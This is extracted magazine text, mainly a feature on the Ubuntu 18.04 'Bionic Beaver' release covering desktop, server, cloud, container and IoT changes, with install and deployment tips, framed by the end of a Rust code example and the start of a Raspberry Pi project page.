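    let (lo, hi) = min_max(3.5, -1.0);
    println!("lo = {}, hi = {}", lo, hi);

    // Shadowing: a second immutable variable reuses the name.
    let year = 2018;
    let year = year + 1;

    let boxed = Box::new(year);
    println!("peeked: {}", peek(&boxed));
    println!("still valid: {}", boxed); // no move has taken place

    let mut count = 0;
    add_one(&mut count);
    println!("count = {}", count);
}
```

Every line uses only constructs introduced above, so building it with cargo run and then deliberately breaking it (say, removing a mut, or passing boxed by value twice) is a quick way to watch the compiler's safety checks in action.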
Feature Ubuntu 18.04 LTS

Top features of Ubuntu 18.04
Ubuntu 'Bionic Beaver' 18.04 represents the first long term support release of a new generation of the leading Linux distribution, with over 30 exciting changes
When major changes happen in a distribution that's as widely used as the Canonical-supported Ubuntu, the Linux universe takes notice. Ubuntu's release schedule is such that seismic shifts typically take place outside long term support (LTS) releases, before then being included later in an LTS version. Ubuntu's regular releases are supported for nine months, but for LTS releases it's five years, which means that a great deal of care and preparation takes place to ensure that what goes into a LTS is as stable as possible. The most recent big change in Ubuntu came with 17.10 Artful Aardvark, which was released in October 2017. This has provided a short but valuable window for developers to shake down the changes before deciding on exactly what makes the cut for the LTS version; as you'll see, not everything made it in, but 18.04 is groundbreaking nonetheless.

Ubuntu 18.04 'Bionic Beaver' represents a shift not only in technology, but also marks a change in perspective for Canonical, the company that supports Ubuntu's development, as it adjusts the focus of its business. A year ago, founder Mark Shuttleworth announced that the company would no longer focus on convergence as its priority, and would instead look to invest in areas that provided growing revenue opportunities – specifically in the server and VM, cloud infrastructure, cloud operations and IoT/Ubuntu Core markets.

While this broadening of focus might at first appear as a cause for concern for desktop users, the reality is quite different. Ubuntu 17.10 demonstrated that a significant change to Ubuntu could be delivered without disruption, and the company has also demonstrated a keen interest in taking on board user feedback to help shape 18.04. A survey distributed to help choose the Ubuntu default applications elicited tens of thousands of responses and was used to refine the release. Ubuntu continues to be a distribution that targets a broad range of users: basic web or office users, developers, sysadmins, robotics engineers – they are all catered for. Of course, if the default Ubuntu isn't quite to your taste, a wide range of alternative flavours continue to be available for a variety of use cases, hardware configurations or personal preference.

Why is this release called 'Bionic Beaver'? Well, Mark Shuttleworth described the beaver as having an "energetic attitude, industrious nature and engineering prowess", which he then likened to Ubuntu contributors. Meanwhile, the 'Bionic' part is a hat-tip to the growing number of robots running Ubuntu Core. Nice!

At a glance
• Desktop (p60): Ubuntu 18.04 ditches the Unity desktop and brings GNOME on X.Org to LTS for the first time in a long time.
• Server (p62): The Server release of Bionic Beaver sports a much-improved installer and a new, smaller ISO file for a minimal install option.
• Cloud (p64): The latest Ubuntu release offers tighter integration with Canonical's cloud offerings and a simplified deployment process.
• Containers (p66): As well as a new release of LXD, Ubuntu continues to offer support for Kubernetes and Docker on public, private, hybrid or bare-metal clouds.
• Core/IoT/Robotics (p68): Ubuntu is experiencing huge growth in the areas of IoT players and robotics, making use of Canonical's investment in the snap ecosystem.

Ubuntu Desktop
The new GNOME on Ubuntu era makes its way to LTS

Should you be upgrading to Ubuntu 18.04 (named after the fourth month of 2018) from 17.10, the latest version will feel like a regular incremental upgrade, with the major changes having happened in the last release. If you're upgrading from the last LTS version, you're in for more of a surprise.

The biggest visual change is the shift from Unity to GNOME. Bionic ships with GNOME version 3.28, running the 'Ambiance' theme as always, and is tweaked to provide as painless a transition as possible for existing users. This also extends to running Nautilus 3.26 rather than the latest 3.28, as the latest release removes the ability to put shortcuts on the desktop. You do get a nice new Bionic Beaver-themed desktop background of course, with support for up to 8K displays!

The original expectation was that this release would ship with an all-new theme developed by the community, but unfortunately, despite work on the theme kicking off last November, it wasn't ready in time for the 18.04 user-interface freeze due to a number of outstanding bugs and an overall lack of broader testing. That's disappointing for sure, but given the nature of a LTS release, stability is always the primary concern. With that said, for those who want to install the new theme – called Communitheme – the expectation is that it will be made available in the future via an official snap package. The intention is that the theme will appear as a separate session on the login screen, making it straightforward to test and revert if needed, rather than having to use the GNOME Tweak Tool. One other side-effect of the switch to GNOME is that the login screen is now powered by GDM rather than lightdm.

Above: Ubuntu now includes GNOME 3.28, with tweaks and customisations designed to improve familiarity for migrating Unity users, together with an updated Nautilus look and feel

Quick guide: Ubuntu flavours

Kubuntu
Kubuntu brings KDE Plasma to Ubuntu, providing an alternative high-end desktop environment. If you're switching to Ubuntu 18.04 from the last LTS release, you're going to change your desktop environment anyway, so what about trying KDE? The Qt-based desktop is fast, beautiful and quite a different option!

Lubuntu
Lubuntu is a more lightweight version of Ubuntu, running the LXDE desktop environment. If you're running Ubuntu on lower-spec hardware – perhaps even a Raspberry Pi – the light but fully featured Lubuntu may be worth a look. Unlike the main flavour, 32-bit images are still available.

Xubuntu
Xubuntu provides another lightweight alternative, using the Xfce desktop environment. Like Lubuntu, Xubuntu focuses on running well on modest hardware, but has all the applications pre-installed to get you up and running right out of the box. Beautiful design also features extensively.
In addition to Communitheme, another feature that didn't make the cut for Bionic, and in fact has been restored from the previous release, is the switch from X.Org to Wayland as the default display server. Once again the focus on stability and some outstanding issues meant that it just wasn't felt ready for prime-time.

Snaps, the universal Linux packaging format, is a growing focus with each Ubuntu release and comes to the fore in 18.04 with increased prominence in the Software Centre and a standard set installed including calculator, characters, logs and a system monitor. Snaps are designed to bundle all the dependencies an application needs, therefore reducing common issues with missing libraries and the need to repack an app as multiple versions for several different distributions.

Ubuntu 18.04 – which is the first LTS release to come with ISOs for 64-bit machines only – ships with version 4.15 of the Linux kernel. This version includes Meltdown and Spectre patches as well as secure, encrypted virtualisation and better graphics support for AMD processors, a whole host of new drivers, and a huge number of minor fixes since version 4.13, and particularly since version 4.10 in the last LTS point release.

Other changes
If you're installing the new release from scratch, you may spot several minor changes. While the Ubiquity installer is still used, there are some additional options to be aware of. The first is the 'minimal' option, which installs Ubuntu without most of the pre-installed software. This saves around 500MB, but the resulting install itself is not particularly lightweight, particularly when compared to some alternative flavours.

When partitioning, you will no longer be prompted to create a swap partition. This is because file-based swap is now used. Finally, Ubuntu 18.04 will collect data about your Ubuntu flavour, location, installed hardware and so on by default, with the ability to opt out if desired. The data collected by this method will be anonymous, which has mostly alleviated privacy concerns from the community. After installation, you'll notice significant boot-speed improvements in the new release.

Among the raft of software updates, there are some that are particularly worthy of note, such as the addition of colour emoji support (via Noto Color Emoji), GNOME To-Do and the upgrading of LibreOffice to version 6. The Linux office suite continues to go from strength to strength, with the latest release further developing the Notebookbar, adding even better forms support, providing enhanced mail merging, including initial OpenPGP support and boasting even better interoperability with other (Microsoft) office suites.

For web developers working on Ubuntu, it should be noted that ahead of Python 2's upstream end of life in 2020, it has been removed from the main repositories and Python 3 is now installed by default. You will need to enable the 'universe' repository to install the older version in this release. Users of the GNOME Boxes app will be pleased to learn that 'spice-vdagent' is now pre-installed, providing better performance for Spice clients. This is an open source project to provide remote access to virtual machines in a seamless way, so you can play videos, record audio, share USB devices and share folders without complications.

Quick tip: Install Communitheme
You can try Communitheme yourself. Use sudo add-apt-repository ppa:communitheme/ppa, sudo apt update then sudo apt install ubuntu-communitheme-session.

Ubuntu Budgie
Users migrating from another OS might find the Budgie desktop a more familiar experience. Ubuntu Budgie uses the simplicity and elegance of the Budgie interface to produce a traditional desktop-orientated distro with a modern paradigm. It's focused on offering a clean and yet powerful desktop.

Ubuntu MATE
The MATE desktop uses a traditional desktop metaphor and runs well on hardware like the Pi. The Ubuntu MATE project is effectively the continuation of the GNOME 2 project. Its tried-and-tested desktop metaphor is easy to use, and prebuilt images are provided for numerous Raspberry Pi devices.

Ubuntu Studio
Multimedia content creation is the focus of Ubuntu Studio, which uses the same GNOME desktop. Ubuntu Studio focuses on taking the base desktop image and configuring it to provide best performance for creative pros. It also includes a default software set suited to audio, graphics, video and publishing use.
Feature Ubuntu 18.04 LTS

quick guide
Install a 32-bit version

Ubuntu 18.04 is the first release to offer only a 64-bit full install ISO for download. If you do need to run on 32-bit hardware (or other alternative architectures such as ARM), you have a couple of options. First, you can simply install the previous LTS release (16.04.3) and upgrade to the latest version. Alternatively, you can use the netboot image. This tiny image – available in ISO and USB stick versions together with the files needed to carry out a PXE network boot – includes just enough of the distribution to be able to boot from a network to download the rest of the required files. When launched, the installer prompts for basic network configuration including an optional HTTP proxy, language and keyboard preferences, mirror selection and user details, before installing the distribution as normal by downloading the required packages on the fly. Another option is to make your own custom ISO; Cubic, available via sudo apt-add-repository ppa:cubic-wizard/release && sudo apt install cubic, provides a GUI for this.

Above The Subiquity installer brings much-needed improvements to the ease and speed of server installs

Ubuntu Server
Server installs are hugely important to Ubuntu

While desktop users may be keen to update to the 'latest and greatest', that doesn't apply to Ubuntu Server users. Stability is vital in the server environment and as such it makes sense to stay on LTS versions, upgrading only to point releases and only then upgrading systems with caution after a new version.
The first change for server users comes early, with a long-overdue installer update. Ubuntu Server now uses Subiquity (aka 'Ubiquity for servers'), which finally brings to servers the live-session support and fast installation using Curtin (and boy, is it fast!) that has long been present on the desktop. The installer is still text-based as you'd expect, but is far more pleasant to use. The installer does a great job of replicating the flow of the desktop setup but is tailored to a server environment.
As well as the underlying updates in the desktop release there are several server-specific improvements in Bionic Beaver. LXD, the pure container hypervisor, has been updated to version 3.0. This release, itself an LTS version with support until June 2023, adds native clustering right out of the box, physical-to-container migration via lxd-p2c, support for Nvidia runtime passthrough and a host of other fixes and improvements. QEMU, the open source machine emulator and virtualiser, is updated to version 2.11.1. Meltdown and Spectre mitigations are included in the new release, although using the mitigations requires more than just the QEMU upgrade – the process is detailed in a post on the project's blog. RDMA support is now enabled, improving network latency and throughput. Libvirt, the virtualisation API, has been updated to version 4, bringing the latest improvements to this software designed for automated management of virtualisation hosts.

Above You'll need to use the -d switch to perform an upgrade before the first LTS point release

If you deal with cloud images, you'll be pleased to hear that cloud-init – a set of Python scripts and utilities for working with said images – gets a bump to the very latest 18.2 version, with support for additional clouds, additional Ubuntu modules, Puppet 4 and speed improvements when working with Azure. Ubuntu 18.04 also updates DPDK (a set of data plane libraries and
network interface controller drivers for
fast packet processing) to the latest stable
release branch, 17.11.x. The intention is that
future stable updates to this branch will be
made available to the Ubuntu LTS release by
a SRU (StableReleaseUpdates) model, which
is new to DPDK.
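To make the cloud-init mention above concrete, here is a hedged sketch of the YAML 'user-data' that cloud-init consumes at first boot; the package and command choices are invented for the example:

```yaml
#cloud-config
# Illustrative cloud-init user-data: refresh the package index,
# install one package and start it on first boot.
package_update: true
packages:
  - nginx
runcmd:
  - systemctl enable --now nginx
```

A file like this is passed to the cloud provider (or to an instance launcher) when the image is started, and cloud-init applies it on the first boot only.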
Open vSwitch, the multilayer virtual
switch designed to enable massive network
automation through programmatic extension,
still supports standard management
interfaces and protocols such as NetFlow,
sFlow, IPFIX, RSPAN, CLI, LACP and 802.1ag.
It has been updated to version 2.9, which
includes support for the latest DPDK and the
latest Linux kernel.
Ntpd, for a long time the staple for NTP time management, is replaced by Chrony in Ubuntu 18.04. The change was made to allow the system clock to synchronise more quickly and accurately, particularly in situations when internet access is brief or congested, although some legacy NTP modes like broadcast clients or multicast server/clients are no longer included. Ntpd is still available from the universe repository, but as it is subject to only 'best endeavours' security updates, its use is not generally recommended. Note that systemd-timesyncd is installed by default and Chrony only needs to be used should you wish to take advantage of its enhanced features.
Bionic marks the end of the LTS road for ifupdown and /etc/network/interfaces. Network devices are now configured using netplan and YAML files stored in /etc/netplan on all new Ubuntu installs. Administrators can use netplan ifupdown-migrate to perform simple migrations on existing installs. The change to netplan is focused on making it more straightforward to describe complex network configs, as well as providing a more consistent experience when dealing with multiple systems via MAAS or when using cloud provisioning via cloud-init.

When should I upgrade?
If you've read through the release notes for Bionic and you're happy with what's included, the upgrade process itself is straightforward: simply update your existing install and run sudo do-release-upgrade. Follow through the on-screen instructions and the updated packages will be downloaded and installed, with a final reboot required for the changes to take effect. Note, however, that the above process will only work when the first LTS point release drops (that is, 18.04.1). To update before this time, you effectively need to pass the developer switch: sudo do-release-upgrade -d. This is an abundance of caution on Canonical's part, but it is prudent not to upgrade your fleet of servers the minute the ISO is available!
A sensible approach when performing a major upgrade, whether on a server or a desktop, is to run as full a test cycle as possible before making changes on a system that is effectively in a production state. This can be easily achieved using a tool like Clonezilla (https://clonezilla.org) if that's feasible, although there are several alternative approaches if you need to keep your system running during the process. Note that while it is technically possible to revert from an upgrade, it's not a particularly straightforward process and is therefore not particularly recommended.

quick guide
Using the new Subiquity

The ncurses-based Subiquity installer is a huge improvement over previous versions of Ubuntu and makes installing the Server distribution a breeze. It should be noted, though, that the feature set is a little limited for some use cases, with no support yet for LVM, RAID or multipath, although these are expected in a future release. After booting the ISO, Subiquity prompts for language and keyboard settings (with automatic keyboard identification offered) before providing the options to install the main OS, a MAAS Region Controller or a MAAS Rack Controller. Network interfaces can be configured with DHCP or static addresses (both IPv4 and IPv6) and, as on the desktop, automatic (full disk) or manual partitioning can be used. At this point, installation starts in the background and progress is shown at the bottom of the screen while user details are entered (including the ability to import SSH identities). A log summary is displayed on screen and a full log can be viewed at completion, before selecting the reboot option.

quick tip
No reboot required for updates with Livepatch
The Canonical Livepatch service enables critical kernel security fixes to be provided without rebooting. It's free for a small number of devices and is enhanced in Bionic with dynamic MOTD status updates.
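To show the declarative style netplan encourages, here is a minimal sketch of a file of the kind stored in /etc/netplan; the interface names and addresses are invented for the example:

```yaml
# Illustrative /etc/netplan/01-netcfg.yaml: one DHCP interface
# and one statically addressed interface. Device names are examples.
network:
  version: 2
  renderer: networkd
  ethernets:
    enp3s0:
      dhcp4: true
    enp4s0:
      addresses: [192.168.1.10/24]
      gateway4: 192.168.1.1
      nameservers:
        addresses: [192.168.1.1]
```

Changes are applied with sudo netplan apply, or trialled with netplan try, which rolls back automatically if the new configuration locks you out.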


Ubuntu Cloud
The Ubuntu push to the cloud gathers pace, with a broad product offering

Canonical has already highlighted
the importance of Ubuntu Cloud to
its revised strategy as a rapidly
growing revenue stream. Ubuntu is well on
the way to becoming the standard OS for
cloud computing, with 70 per cent of public
cloud workloads and 54 per cent of
OpenStack clouds using the OS.
Canonical has supported OpenStack on
Ubuntu since early 2011, but what exactly is
it? OpenStack is a “cloud operating system
that controls large pools of compute, storage,
and networking resources throughout
a datacentre, all managed through a
dashboard that gives administrators control
while empowering their users to provision
resources through a web interface”.
Above The 'conjure-up' tool includes several pre-packed 'spells' for cloud and container deployments

Getting started with OpenStack for your own use is straightforward, thanks to a tool called conjure-up. This is ideal if you want to quickly build an OpenStack cloud on a single machine in minutes; in addition, the same utility can also deploy to public clouds or to a group of four or more physical servers using MAAS (Metal As A Service – cloud-style provisioning for physical server hardware, particularly targeting big data, private cloud, PAAS and HPC). For local use, conjure-up can use LXD containers against version 3.0 of LXD included in Bionic Beaver. The LXD hypervisor runs unmodified Linux guest operating systems with VM-style operations at uncompromised speed. LXD containers provide the experience of virtual machines with the security of a hypervisor, but running much, much faster. On bare-metal, LXD containers are as fast as the native OS, which means that in the cloud, you get subdivided machines without reduced performance.
Conjure-up itself is installed as a snap package, as is LXD, which will increasingly become the Ubuntu way from 18.04 onwards. First install LXD using sudo snap install lxd followed by lxd init and newgrp lxd. Next, use sudo snap install conjure-up --classic and conjure-up to launch the tool itself. The text-based utility – it's built for servers, after all – provides a list of recommended 'spells'. Spells are descriptions of how software should be deployed and are made up of YAML files, charms and deployment scripts. The main conjure-up spells are stored in a GitHub registry at https://github.com/conjure-up/spells; however, spells can be hosted anywhere – a GitHub repo location can be passed directly to the tool, from which spells will be loaded. 'OpenStack with NovaLXD'

quick guide
Use Juju to deploy a service
Juju ‘charms’ provide the easiest cs:elasticsearch. When the
way to simplify deployment and command completes, ElasticSearch
management of specific services. is up! By default, the application
Found at https://jujucharms. port (9200) is only available from the
com, charms cover many different instance itself, but changing this
scenarios including ops, analytics, is as simple as using the command
Apache, databases, network, juju expose elasticsearch. Use
monitoring, security, OpenStack juju status to confirm which ports
and more. Using the ElasticSearch are open. To open all ports, use the
charm as an example, using it is command juju set elasticsearch
as simple as entering juju deploy firewall_enabled=false.

is the best spell to start with – you'll note spells are also provided for big data analysis using Apache Hadoop and Spark, as well as for Kubernetes.
After selecting the spell, you'll be prompted to choose a setup location (localhost), configure network and storage, then provide a public key to enable you to access the newly deployed instance. Accept the default application configuration and hit 'Deploy'. Juju Controller – part of Juju, an open source application and service modelling tool – will then deploy your configuration. After setup completes, you'll be able to open the OpenStack Dashboard at http://<openstack ip>/horizon and login with the default admin/openstack username and password to see what has been created. Use the lxc list command to validate that the system you've conjured up is running.

quick guide
Try Ubuntu in the cloud for free

Ubuntu offers exciting opportunities for deploying to the cloud, but due to the pricing models, costs can rack up quickly! Thankfully, if you want to try out some cloud deployments without spending any money, a number of providers have free offerings available. Amazon's AWS has the best deal, with a free tier that provides a server running 24 hours a day for a whole year, plus a host of add-on services. Its 'Lightsail' offering also offers a free one-month trial of the basic instance. Google Cloud Platform offers $300 credit valid for 12 months, plus, like Amazon, a free product tier to get you started. DigitalOcean offers $100 to get started with its services and is a great alternative to the bigger players. You may not expect it, but Microsoft's Azure also has useful Linux options with £150 credit valid for 30 days and, once again, its own free low-usage tier. All these services are easy to set up and come with Ubuntu Server and container images.
Canonical also offers BootStack, which is an ongoing, fully managed private OpenStack cloud. This is ideal for on-premise deployments and is supplemented by a lighter-touch service, Foundation Cloud Build for Ubuntu OpenStack, where a Canonical team will build a highly available production cloud, implemented on-site in the shortest possible time. Foundation Cloud Build is well suited to redeploying or cloning existing cloud architecture.
Should you want to manage your own deployment to public clouds, certified images are available for AWS, Azure, Google Cloud Platform, Rackspace and many other such services.

The charms of Juju
While conjure-up uses Juju internally, it can also be used directly to model, configure and manage services for deployment to all major public and private clouds with only a few commands. Over 300 preconfigured services are available in the Juju store (known as 'charms'), which are effectively scripts that simplify the deployment and management tasks of specific services. Of course, Juju is free and open source.
One further piece of the Ubuntu cloud puzzle is Canonical's 'Cloud Native Platform', which is a pure Kubernetes play. Cloud Native Platform is provided in partnership with Rancher Labs and delivers a turnkey application-delivery platform, built on Ubuntu, Kubernetes and Rancher, a Kubernetes management suite.
After you've deployed to the cloud, a common challenge is exactly how you manage the servers in your infrastructure. Canonical has a tool to help with this in the form of 'Landscape', to deploy, monitor and manage Ubuntu servers. Landscape monitors systems using a management agent installed on each machine, which in turn communicates with a centralised server to send back health metrics, update information and other data for up to 40,000 machines. Landscape is a paid service starting at 1¢ per machine per hour when used as a SaaS product; however it can be deployed for on-premise use on up to 10 machines for free.
Although many of the pieces of the cloud software stack are updated independently of the main OS, inclusion of these latest technologies in the LTS release drives forward the possibilities of what can be achieved using the cloud with Ubuntu.

quick tip
Set up Landscape
Add the PPA: sudo add-apt-repository ppa:landscape/17.03 and update your package list (sudo apt update). Install: sudo apt install landscape-server-quickstart.


how to
Deploy Kubernetes on Ubuntu to a cloud provider

1 Install conjure-up
Conjure-up itself is installed from a snap package using the command sudo snap install conjure-up --classic. After installation, use conjure-up to launch the tool. If you're using a pre-snap release, install snapd first with sudo apt install snapd.

2 Select a Kubernetes spell and choose a cloud
After launching conjure-up and selecting 'The Canonical Distribution of Kubernetes' as your spell, you'll be prompted to choose a cloud provider. Choose 'new self-hosted controller' and accept the listed default apps to begin the deployment.

3 Connect to and manage your Kubernetes
After the deployment completes, kubectl (for management) and kubefed (for federation) tools will be installed on your local machine. Use kubectl cluster-info to show the cluster status and confirm all is good.

Containers
Containers underpin the Ubuntu cloud

Above Conjure-up can be used to deploy The Canonical Distribution of Kubernetes either locally or to a supported cloud provider, including all the major players

There's no doubt that containers are driving innovation in the cloud as a logical progression from VMs. Canonical's strategy has changed as technology has matured, but essentially it is supporting a wide range of technologies rather than backing a specific approach.
LXD is important to Ubuntu (Canonical founded and currently leads the project), with the latest release of the next-generation system container manager included in Ubuntu 18.04. LXD is particularly popular because it offers a user experience that is similar to that of virtual machines while using Linux containers instead. At its heart LXD is a privileged daemon which exposes a REST API. Clients, such as the command-line tool provided with LXD itself, then do everything through that REST API. This means that whether you're talking to your local host or a remote server, everything works the same way. LXD is secure by design thanks in part to unprivileged containers and resource restrictions, is scalable for use on your own laptop or with thousands of container nodes, is intuitive and image-based, provides an easy way to transfer images from system to system and provides advanced control and passthrough for hardware resources, including network and storage. Of course, LXD is well integrated with OpenStack and, as a snap package, is easy to deploy not just on Ubuntu but other Linux distributions too. Canonical claims LXD's containers are 25 per cent faster and offer 10 times the density of traditional VMware ESX or Linux KVM installs, which could translate to a significant cost saving.

Docker Engine on Ubuntu
Canonical's container offering wouldn't be complete without the two current heavyweights – Docker and Kubernetes. Docker Engine is a lightweight container runtime with a fully featured toolset that builds and runs your container. Over 65 per cent of all Docker-based scale-out
operations run on Ubuntu.
Stable, maintained releases
of Docker are published and
updated by Docker Inc as
snap packages on Ubuntu,
enabling direct access to
the official Docker Engine
for all Ubuntu users.
Canonical also ensures
global availability of secure
Ubuntu images on Docker
Hub, plus it provides Level 1
and Level 2 technical support
for Docker Enterprise Edition and is
backed by the Docker Inc. company itself
for Level 3 support.

Above If deploying using conjure-up, several cloud providers are supported including AWS (pictured), Azure, CloudSigma, Google, Joyent, Oracle and Rackspace

If you're at the point where you're choosing which container technology to try, it might not be easy to decide between the above options. Fundamentally, LXD provides a classic virtual machine-like experience with all your usual administrative processes running, so it feels just like a normal Ubuntu system. Docker instances, meanwhile, typically contain only a single process or application per container.
LXD is often used to make 'Infrastructure as a Service' OS-instance deployments much faster, whereas Docker is more often used by developers to make 'Platform as a Service' application instances more portable. Bear in mind that the options are not mutually exclusive – you can run Docker on LXD with no performance impact.
As with Docker, Kubernetes is well supported on Ubuntu. As well as the Cloud Native Platform Kubernetes delivered with Rancher, Canonical has a pure Kubernetes offering, known by the rather catchy name of The Canonical Distribution of Kubernetes. This is pure Kubernetes, tested across the widest range of clouds and private infrastructure with modern metrics and monitoring, developed in partnership with Google to ensure smooth operation between Google's Container Engine (GKE) service with Ubuntu worker nodes and Canonical's Distribution of Kubernetes. The stack is platform-neutral for use on everything from Azure to bare metal, upgrades are frequent and security updates are automatically applied, a range of enterprise support options are available, the system is easily extensible, and Canonical even offers a fully managed service. Most important, Canonical Kubernetes leads in standards compliance against the reference implementation.
Kubernetes uses the same process we covered earlier for OpenStack courtesy of conjure-up, only this time you select 'The Canonical Distribution of Kubernetes' in the options. It's worth getting a free account at somewhere like AWS or Azure to provide a standalone cloud test environment.
Deploying containers can be time- and storage-consuming, but one change in Ubuntu 18.04 helps ease the pain. The Bionic Beaver minimal install images have been reduced by over 53 per cent in size compared to 14.04, aided by the removal of over 100 packages and thousands of files. Of course, minimal images are just that – only what you need to get a basic install running and download additional packages – but at only 31MB compressed and 81MB uncompressed, the images sure are small.
In short, snap packages are easing the process of installing much of the container toolset, a bang up-to-date LTS distro improves the experience after deploying a container, and Ubuntu's own ecosystem additions help with use of major platforms.

quick tip
Kubernetes with Juju
Juju can be used to quickly deploy Kubernetes Core (a pure Kubernetes/etcd cluster with no additional services) or The Canonical Distribution of Kubernetes. Use juju deploy cs:bundle/kubernetes-core-292 or juju deploy cs:bundle/canonical-kubernetes-179 respectively.

quick guide
Migrate to containers

Ubuntu 18.04 includes LXD 3.0, which has a new tool called lxd-p2c. This makes it possible to import a system's filesystem into a LXD container using the LXD API. After installation, the resulting binary can be transferred to any system that you want to turn into a container. Point it to a remote LXD server and the entire system's filesystem will be transferred using the LXD migration API and a new container created. This tool can be used not just on physical machines, but from within VMs like VirtualBox or VMware.
Another alternative migration path is from a physical machine or VM to OpenStack. This is possible, but slightly more involved. First, selinux needs to be disabled by editing the /etc/selinux/config file. Next you need to ensure that eth0 is configured for DHCP. Finally, to allow OpenStack to inject the SSH key you must ensure that cloud-init and curl are installed. With that done, simply create a raw disk image (use VBoxManage clonehd -raw if migrating from VirtualBox) and test your image using the kvm command. You then just need to upload your image to OpenStack, register the image and you should be able to start a new instance.
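As noted above, a Docker instance typically wraps a single process. To make that concrete, here is an illustrative Dockerfile on an Ubuntu base – the packaged service is an arbitrary choice for the example, not something mandated by Docker or Canonical:

```dockerfile
# Illustrative single-process container on an Ubuntu 18.04 base
FROM ubuntu:18.04
RUN apt-get update \
    && apt-get install -y --no-install-recommends nginx \
    && rm -rf /var/lib/apt/lists/*
EXPOSE 80
# Run in the foreground so the container's one process is the service itself
CMD ["nginx", "-g", "daemon off;"]
```

Built with docker build and started with docker run, this yields exactly the kind of one-application container the comparison with LXD describes.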


Ubuntu Core, IoT & robotics


Ubuntu is spreading its influence, driven by the Ubuntu Core distribution

Ubuntu Core is a tiny, transactional version of Ubuntu designed for IoT devices, robotics and large container deployments. It's based on the super-secure, remotely upgradeable Linux app packages known as snaps – and it's used by a raft of leading IoT players, from chipset vendors to device makers and system integrators.

Below The current release of ROS, ideal for use on Ubuntu Core, is the 11th version: 'Lunar Loggerhead'

Core uses the same kernel, libraries and system software as classic Ubuntu. Snaps for use with Core can be developed on an Ubuntu PC just like any other application. The difference with Core is that it's been built with the Internet of Things in mind. That means it's secure by default – automatic updates ensure that any critical security issues are addressed even if the device is out in the field. Of course, Ubuntu Core is free; it can be distributed at no cost with a custom kernel, BSP and your own suite of apps. It has unrivalled reliability, with transactional over-the-air updates including full rollback features to cut the costs of managing devices in the field.
Everything in Ubuntu Core is based around digitally signed snaps. The kernel driver and device drivers are packaged as a snap. The minimal OS itself is also a snap. Finally, all apps themselves are also snaps, ensuring all dependencies are tightly managed. The whole distribution comes in at just 350MB, which is smaller than many

expert opinion
Joshua Elsdon, maker behind
the Micro Robots project
“The primary benefit of ROS for me is
that it allows for easy communication
between different software modules,
even over a network. Further, it allows
the community of robotics designers
a core framework on which they can
open source their contributions.”
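Snaps of the kind Core is built from are described by a snapcraft.yaml file. As a rough, illustrative sketch – the name, part layout and command are invented, not taken from any real project – such a file might look like this:

```yaml
# Illustrative snapcraft.yaml for a trivial, strictly confined snap
name: hello-core
version: '0.1'
summary: Example snap
description: A minimal app snap with its dependencies bundled.
grade: stable
confinement: strict
parts:
  hello:
    plugin: dump
    source: .
apps:
  hello:
    command: bin/hello.sh
```

Running snapcraft in the directory containing this file produces a .snap package that can be installed on classic Ubuntu or on Core.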

how to
Build a new Ubuntu Core image for a Raspberry Pi 3

1 Create a key to sign uploads
Before starting to build the image, you need to create a key to sign future store uploads. Generate a key that will be linked to your Ubuntu Store account with snapcraft create-key. Confirm the key with snapcraft list-keys.

2 Register with Ubuntu Store
Next, you have to register your key with the Ubuntu Store, linking it to your account. You will be asked to login with your store account credentials – use the command snapcraft register-key to start the process.

3 Create a model assertion
To build an image, you need to create a model assertion. This is a JSON file which contains a description of your device with fields such as model, architecture, kernel and so on. Base this on an existing device and tweak as needed.
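A model assertion of the sort step 3 describes is a small JSON document. The values below are placeholders loosely modelled on the era's Raspberry Pi 3 example – substitute your own account ID and snap names rather than copying it verbatim:

```json
{
  "type": "model",
  "authority-id": "<your-account-id>",
  "brand-id": "<your-account-id>",
  "series": "16",
  "model": "pi3-test",
  "architecture": "armhf",
  "gadget": "pi3",
  "kernel": "pi2-kernel",
  "timestamp": "2018-05-01T00:00:00+00:00"
}
```

Saved as pi3-model.json, this is the file that steps 4 and 5 sign and feed to ubuntu-image.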

rival platforms despite its rich feature set.
Most importantly, Ubuntu Core supports a huge range of devices, from the 32-bit ARM Raspberry Pi 1 and 2 and the 64-bit Qualcomm ARM DragonBoard 410c to Intel's latest range of IoT SoCs.
The process of building a custom Ubuntu Core image is straightforward. For new boards, it's necessary to create a kernel snap, gadget snap and a model assertion. Otherwise, the process involves registering with Snapcraft (https://snapcraft.io), creating a signed model-assertion JSON document with information about your hardware which is then signed, and finally running a single command to build the image itself (see below).
Ubuntu Core adoption is growing rapidly within the robotics and drone space, thanks to ROS (Robot Operating System, www.ros.org) running on Ubuntu Core. ROS is a flexible framework for writing robot software that includes tools and libraries for creating complex yet robust applications. The ROS Wiki includes detailed instructions on packaging your ROS project as a snap and, as the project then effectively becomes secure and isolated from the OS underneath, it's perfect for this kind of application. The process of installing updates is also much smoother than alternative approaches, with updates applied automatically and transactionally, ensuring the robot is never broken. This all happens via the free Ubuntu store, so there's no need to host your own infrastructure. Finally, sharing your ROS application with the world becomes far easier via Snapcraft – not just as a distribution method, but because you know it will work on a wide range of platforms.
Ubuntu Core version 18 is currently in development, integrating the latest changes and improvements from Bionic Beaver. As well as using version 4.15 of the Linux Kernel, the new release takes advantage of improvements in the snap system that underpins Core to include snapshot support, so that a snap can save data and state at any time. Delta downloads reduce the size of snap updates, which can be scheduled.

[Diagram comparing classic Ubuntu 18.04 with Ubuntu Core 18: both run kernel 4.15, but on Core the applications, the minimal OS and the kernel/device drivers are each packaged as clearly defined, digitally signed snaps bundling their dependencies]
Above Admittedly there will be more snaps in 18.04, but Ubuntu Core 18's OS and kernel are snaps

4 Sign the model assertion
Now you need to sign the model assertion with a key. This outputs a model file, the actual assertion document you will use to build your image. Use the command cat pi3-model.json | snap sign -k default &> pi3.model.

5 Build your image
Create your image with the ubuntu-image tool. The tool is installed as a snap via snap install --beta --classic ubuntu-image. Then use: sudo ubuntu-image -c beta -O pi3-test pi3.model.

6 Flash and test your creation
You're now ready to flash and test your image! Use a tool such as 'dd' or GNOME Multi Writer to write the image to a SD card or USB stick and boot it in your device. You'll be prompted for a store account which downloads the SSH key.

Practical Raspberry Pi
The essential guide for coders & makers

72 "The housing was tricky – I had many leaks"

Contents
72 Meet PipeCam, the Pi-powered underwater camera
74 Super-size your Pi 3 B+ storage, we show you how
76 Create your own voice assistant with Picroft

Pi Project
PipeCam
Using a Pi to keep an eye on the bottom of the ocean is simpler than you might think – apart from the leaks

Fred Fourie
Fred is an electronics technician for an engineering firm in Cape Town, South Africa, that specialises in marine sciences.

Like it?
Fred has done construction projects in the Antarctic and has worked on space weather on remote islands. He gets excited about biological sciences and large datasets. Follow his adventures on Twitter at @FredFourie.

Further reading
